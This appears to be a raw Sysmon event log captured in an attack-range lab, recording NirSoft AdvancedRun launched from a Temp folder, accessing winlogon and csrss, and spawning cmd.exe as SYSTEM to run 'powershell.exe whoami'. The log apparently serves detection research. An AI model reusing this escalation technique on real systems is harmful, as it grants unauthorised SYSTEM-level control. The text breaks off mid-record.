734700x80000000000000004015354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004015347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004015345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.323{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004013561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:10.274{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000004013545Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4284904C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004013544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4284904C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004013543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4284904C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004013542Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004013541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004013540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004013539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:47:09.165{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004011697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.578{834264DD-FF1C-61EA-D105-000000002702}4700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c powershell.exe whoamiC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004011696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\